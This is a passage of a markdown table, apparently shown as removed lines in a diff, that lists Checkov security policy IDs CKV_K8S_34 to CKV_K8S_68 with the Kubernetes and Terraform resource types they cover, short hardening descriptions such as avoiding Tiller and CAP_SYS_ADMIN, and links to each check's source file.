-| 2775 | CKV_K8S_34 | resource | CronJob | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
-| 2776 | CKV_K8S_34 | resource | DaemonSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
-| 2777 | CKV_K8S_34 | resource | Deployment | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
-| 2778 | CKV_K8S_34 | resource | DeploymentConfig | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
-| 2779 | CKV_K8S_34 | resource | Job | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
-| 2780 | CKV_K8S_34 | resource | Pod | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
-| 2781 | CKV_K8S_34 | resource | PodTemplate | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
-| 2782 | CKV_K8S_34 | resource | ReplicaSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
-| 2783 | CKV_K8S_34 | resource | ReplicationController | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
-| 2784 | CKV_K8S_34 | resource | StatefulSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
-| 2785 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
-| 2786 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
-| 2787 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
-| 2788 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
-| 2789 | CKV_K8S_35 | resource | CronJob | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
-| 2790 | CKV_K8S_35 | resource | DaemonSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
-| 2791 | CKV_K8S_35 | resource | Deployment | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
-| 2792 | CKV_K8S_35 | resource | DeploymentConfig | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
-| 2793 | CKV_K8S_35 | resource | Job | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
-| 2794 | CKV_K8S_35 | resource | Pod | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
-| 2795 | CKV_K8S_35 | resource | PodTemplate | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
-| 2796 | CKV_K8S_35 | resource | ReplicaSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
-| 2797 | CKV_K8S_35 | resource | ReplicationController | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
-| 2798 | CKV_K8S_35 | resource | StatefulSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
-| 2799 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
-| 2800 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
-| 2801 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
-| 2802 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
-| 2803 | CKV_K8S_36 | resource | PodSecurityPolicy | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilitiesPSP.py) |
-| 2804 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) |
-| 2805 | CKV_K8S_37 | resource | CronJob | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
-| 2806 | CKV_K8S_37 | resource | DaemonSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
-| 2807 | CKV_K8S_37 | resource | Deployment | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
-| 2808 | CKV_K8S_37 | resource | DeploymentConfig | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
-| 2809 | CKV_K8S_37 | resource | Job | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
-| 2810 | CKV_K8S_37 | resource | Pod | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
-| 2811 | CKV_K8S_37 | resource | PodTemplate | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
-| 2812 | CKV_K8S_37 | resource | ReplicaSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
-| 2813 | CKV_K8S_37 | resource | ReplicationController | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
-| 2814 | CKV_K8S_37 | resource | StatefulSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
-| 2815 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
-| 2816 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
-| 2817 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
-| 2818 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
-| 2819 | CKV_K8S_38 | resource | CronJob | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) |
-| 2820 | CKV_K8S_38 | resource | DaemonSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) |
-| 2821 | CKV_K8S_38 | resource | Deployment | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) |
-| 2822 | CKV_K8S_38 | resource | Job | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) |
-| 2823 | CKV_K8S_38 | resource | Pod | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) |
-| 2824 | CKV_K8S_38 | resource | ReplicaSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) |
-| 2825 | CKV_K8S_38 | resource | ReplicationController | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) |
-| 2826 | CKV_K8S_38 | resource | StatefulSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) |
-| 2827 | CKV_K8S_39 | resource | CronJob | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) |
-| 2828 | CKV_K8S_39 | resource | DaemonSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) |
-| 2829 | CKV_K8S_39 | resource | Deployment | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) |
-| 2830 | CKV_K8S_39 | resource | DeploymentConfig | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) |
-| 2831 | CKV_K8S_39 | resource | Job | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) |
-| 2832 | CKV_K8S_39 | resource | Pod | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) |
-| 2833 | CKV_K8S_39 | resource | PodTemplate | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) |
-| 2834 | CKV_K8S_39 | resource | ReplicaSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) |
-| 2835 | CKV_K8S_39 | resource | ReplicationController | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) |
-| 2836 | CKV_K8S_39 | resource | StatefulSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) |
-| 2837 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) |
-| 2838 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) |
-| 2839 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) |
-| 2840 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) |
-| 2841 | CKV_K8S_40 | resource | CronJob | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) |
-| 2842 | CKV_K8S_40 | resource | DaemonSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) |
-| 2843 | CKV_K8S_40 | resource | Deployment | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) |
-| 2844 | CKV_K8S_40 | resource | Job | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) |
-| 2845 | CKV_K8S_40 | resource | Pod | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) |
-| 2846 | CKV_K8S_40 | resource | ReplicaSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) |
-| 2847 | CKV_K8S_40 | resource | ReplicationController | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) |
-| 2848 | CKV_K8S_40 | resource | StatefulSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) |
-| 2849 | CKV_K8S_41 | resource | ServiceAccount | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccount.py) |
-| 2850 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) |
-| 2851 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) |
-| 2852 | CKV_K8S_42 | resource | ClusterRoleBinding | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) |
-| 2853 | CKV_K8S_42 | resource | RoleBinding | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) |
-| 2854 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) |
-| 2855 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) |
-| 2856 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) |
-| 2857 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) |
-| 2858 | CKV_K8S_43 | resource | CronJob | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) |
-| 2859 | CKV_K8S_43 | resource | DaemonSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) |
-| 2860 | CKV_K8S_43 | resource | Deployment | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) |
-| 2861 | CKV_K8S_43 | resource | DeploymentConfig | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) |
-| 2862 | CKV_K8S_43 | resource | Job | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) |
-| 2863 | CKV_K8S_43 | resource | Pod | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) |
-| 2864 | CKV_K8S_43 | resource | PodTemplate | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) |
-| 2865 | CKV_K8S_43 | resource | ReplicaSet 
| Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2866 | CKV_K8S_43 | resource | ReplicationController | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2867 | CKV_K8S_43 | resource | StatefulSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2868 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2869 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2870 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2871 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2872 | CKV_K8S_44 | resource | Service | Ensure that the Tiller Service (Helm v2) is deleted | Kubernetes | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerService.py) | -| 2873 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | -| 2874 | 
CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | -| 2875 | CKV_K8S_45 | resource | CronJob | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2876 | CKV_K8S_45 | resource | DaemonSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2877 | CKV_K8S_45 | resource | Deployment | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2878 | CKV_K8S_45 | resource | DeploymentConfig | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2879 | CKV_K8S_45 | resource | Job | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2880 | CKV_K8S_45 | resource | Pod | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 
2881 | CKV_K8S_45 | resource | PodTemplate | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2882 | CKV_K8S_45 | resource | ReplicaSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2883 | CKV_K8S_45 | resource | ReplicationController | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2884 | CKV_K8S_45 | resource | StatefulSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2885 | CKV_K8S_49 | resource | ClusterRole | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | -| 2886 | CKV_K8S_49 | resource | Role | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | -| 2887 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2888 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in 
Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2889 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2890 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2891 | CKV_K8S_68 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2892 | CKV_K8S_68 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2893 | CKV_K8S_68 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2894 | CKV_K8S_68 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2895 | 